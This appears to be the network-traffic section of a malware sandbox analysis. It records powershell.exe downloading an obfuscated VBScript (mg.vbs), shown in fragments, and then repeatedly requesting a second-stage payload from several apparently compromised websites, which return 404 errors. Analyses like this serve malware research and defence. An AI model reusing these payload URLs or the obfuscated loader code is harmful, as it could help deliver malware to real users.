                                                                            2024-12-05 09:39:28 UTC408INData Raw: 46 50 32 20 2d 20 46 46 50 33 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 39 30 2d 6d 61 73 63 68 65 72 65 2d 70 65 72 2d 73 61 6c 64 61 74 75 72 61 22 20 74 69 74 6c 65 3d 22 4d 61 73 63 68 65 72 65 20 70 65 72 20 73 61 6c 64 61 74 75 72 61 22 3e 4d 61 73 63 68 65 72 65 20 70 65 72 20 73 61 6c 64 61 74 75 72 61 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 33 31 34 2d 73 63 61 72 70 65 2d 61 6e 74 69 6e 66 6f 72 74 75 6e 69 73 74 69 63 68 65 2d 65 2d 73 74 69 76 61 6c 65 2d 64 61 2d 6c 61 76 6f 72 6f 22 20 74 69 74 6c 65 3d
                                                                            Data Ascii: FP2 - FFP3</a></li><li class=""><a href="https://www.fornid.com/90-maschere-per-saldatura" title="Maschere per saldatura">Maschere per saldatura</a></li><li class=""><a href="https://www.fornid.com/314-scarpe-antinfortunistiche-e-stivale-da-lavoro" title=


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.114973491.193.42.134437700C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:39:30 UTC79OUTGET /na/mg.vbs HTTP/1.1
                                                                            Host: www.pineappletech.ae
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:39:30 UTC232INHTTP/1.1 200 OK
                                                                            Connection: close
                                                                            content-type: text/vbscript
                                                                            last-modified: Thu, 27 Jun 2024 13:15:58 GMT
                                                                            accept-ranges: bytes
                                                                            content-length: 29287
                                                                            date: Thu, 05 Dec 2024 09:39:30 GMT
                                                                            server: LiteSpeed
                                                                            vary: User-Agent
                                                                            2024-12-05 09:39:30 UTC1136INData Raw: 0d 0a 0d 0a 0d 0a 46 75 6e 63 74 69 6f 6e 20 53 65 61 73 6f 6e 69 6e 67 28 41 6d 62 72 61 69 6e 29 0d 0a 0d 0a 0d 0a 50 75 62 6c 69 6b 75 6d 6d 65 74 62 61 74 66 6f 77 6c 20 3d 20 4d 69 64 28 4d 69 64 42 28 43 6f 6d 6d 61 6e 64 2c 20 34 34 2c 20 32 31 33 29 2c 32 31 2c 32 35 29 0d 0a 0d 0a 53 65 61 73 6f 6e 69 6e 67 20 3d 20 43 68 72 57 28 41 6d 62 72 61 69 6e 29 0d 0a 0d 0a 4f 70 73 6b 72 65 6b 6e 69 76 73 70 6c 69 64 20 3d 20 43 6f 6d 6d 61 6e 64 20 0d 0a 0d 0a 0d 0a 45 6e 64 20 46 75 6e 63 74 69 6f 6e 20 0d 0a 0d 0a 65 6c 65 6b 74 72 6f 69 6e 67 65 6e 69 72 65 72 6e 65 20 3d 20 4c 65 6e 42 28 22 53 61 72 64 69 6e 69 65 72 65 6e 22 29 20 0d 0a 65 6c 65 6b 74 72 6f 69 6e 67 65 6e 69 72 65 72 6e 65 20 3d 20 65 6c 65 6b 74 72 6f 69 6e 67 65 6e 69 72 65 72
                                                                            Data Ascii: Function Seasoning(Ambrain)Publikummetbatfowl = Mid(MidB(Command, 44, 213),21,25)Seasoning = ChrW(Ambrain)Opskreknivsplid = Command End Function elektroingenirerne = LenB("Sardinieren") elektroingenirerne = elektroingenirer
                                                                            2024-12-05 09:39:31 UTC14994INData Raw: 43 6f 6e 73 74 20 54 61 70 65 74 69 20 3d 20 22 44 65 6e 69 61 62 6c 65 20 64 61 74 61 73 74 79 72 20 75 6e 63 65 6c 69 62 61 74 65 22 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 4e 6f 61 6f 72 64 65 74 73 20 3d 20 2d 34 35 30 38 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 4f 73 74 65 6d 61 64 20 3d 20 26 48 37 35 30 32 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 42 6f 74 72 79 6f 6d 79 63 65 73 31 34 31 20 3d 20 26 48 46 46 46 46 45 38 38 38 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 55 66 6f 72 64 72 61 67 65 6c 69 67 73 74 65 20 3d 20 26 48 35 41 36 35 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 52 65 76 65 72 73 6f 20 3d 20 26 48 45 39 34 38 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 53 61 61 74 73 20 3d 20 22 44 65 63 69 6d
                                                                            Data Ascii: Const Tapeti = "Deniable datastyr uncelibate"Private Const Noaordets = -4508Private Const Ostemad = &H7502Private Const Botryomyces141 = &HFFFFE888Private Const Ufordrageligste = &H5A65Private Const Reverso = &HE948Private Const Saats = "Decim
                                                                            2024-12-05 09:39:31 UTC13157INData Raw: 65 64 6e 65 73 73 22 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 53 6b 61 6b 73 70 69 6c 6c 65 72 65 6e 73 20 3d 20 31 37 34 38 38 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 47 6c 69 6e 73 65 6e 64 65 20 3d 20 2d 34 32 34 35 34 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 45 76 61 73 69 76 65 6e 65 73 73 20 3d 20 26 48 34 38 43 45 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 4c 65 70 74 6f 72 72 68 69 6e 69 73 6d 31 35 35 20 3d 20 2d 31 38 39 31 38 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 50 72 6f 67 72 61 6d 6b 6f 6d 70 6c 65 6b 73 65 74 20 3d 20 22 43 6f 6e 67 72 65 73 73 65 73 20 6d 6f 6c 69 6d 65 6e 20 6e 67 73 74 65 6c 69 67 65 72 65 73 22 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 43 69 67 61 72 6b 61 73 73 65 20 3d 20 35
                                                                            Data Ascii: edness"Private Const Skakspillerens = 17488Private Const Glinsende = -42454Private Const Evasiveness = &H48CEPrivate Const Leptorrhinism155 = -18918Private Const Programkomplekset = "Congresses molimen ngsteligeres"Private Const Cigarkasse = 5


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.1149748184.171.244.231443832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:39:34 UTC183OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                            Host: www.almrwad.com
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:39:35 UTC164INHTTP/1.1 404 Not Found
                                                                            Date: Thu, 05 Dec 2024 09:39:35 GMT
                                                                            Server: Apache
                                                                            Content-Length: 315
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            2024-12-05 09:39:35 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.1149765184.171.244.231443832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:39:40 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.almrwad.com
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:39:41 UTC164INHTTP/1.1 404 Not Found
                                                                            Date: Thu, 05 Dec 2024 09:39:41 GMT
                                                                            Server: Apache
                                                                            Content-Length: 315
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            2024-12-05 09:39:41 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            4192.168.2.1149777148.251.114.233443832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:39:46 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.erp-royal-crown.info
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:39:47 UTC238INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Thu, 05 Dec 2024 09:39:47 GMT
                                                                            server: LiteSpeed
                                                                            2024-12-05 09:39:47 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                            2024-12-05 09:39:47 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            5192.168.2.1149792184.171.244.231443832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:39:52 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.almrwad.com
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:39:53 UTC164INHTTP/1.1 404 Not Found
                                                                            Date: Thu, 05 Dec 2024 09:39:53 GMT
                                                                            Server: Apache
                                                                            Content-Length: 315
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            2024-12-05 09:39:53 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.1149806148.251.114.233443832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:39:58 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.erp-royal-crown.info
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:39:59 UTC238INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Thu, 05 Dec 2024 09:39:58 GMT
                                                                            server: LiteSpeed
                                                                            2024-12-05 09:39:59 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                            2024-12-05 09:39:59 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            7192.168.2.1149822184.171.244.231443832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:40:04 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.almrwad.com
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:40:04 UTC164INHTTP/1.1 404 Not Found
                                                                            Date: Thu, 05 Dec 2024 09:40:04 GMT
                                                                            Server: Apache
                                                                            Content-Length: 315
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            2024-12-05 09:40:04 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            8192.168.2.1149834148.251.114.233443832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:40:10 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.erp-royal-crown.info
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:40:10 UTC238INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Thu, 05 Dec 2024 09:40:10 GMT
                                                                            server: LiteSpeed
                                                                            2024-12-05 09:40:10 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                            2024-12-05 09:40:10 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            9192.168.2.1149851184.171.244.231443832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:40:16 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.almrwad.com
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:40:16 UTC164INHTTP/1.1 404 Not Found
                                                                            Date: Thu, 05 Dec 2024 09:40:16 GMT
                                                                            Server: Apache
                                                                            Content-Length: 315
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            2024-12-05 09:40:16 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            10192.168.2.1149866148.251.114.233443832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:40:22 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.erp-royal-crown.info
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:40:22 UTC238INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Thu, 05 Dec 2024 09:40:22 GMT
                                                                            server: LiteSpeed
                                                                            2024-12-05 09:40:22 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                            2024-12-05 09:40:22 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            11192.168.2.1149879184.171.244.231443832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:40:28 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.almrwad.com
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:40:28 UTC164INHTTP/1.1 404 Not Found
                                                                            Date: Thu, 05 Dec 2024 09:40:28 GMT
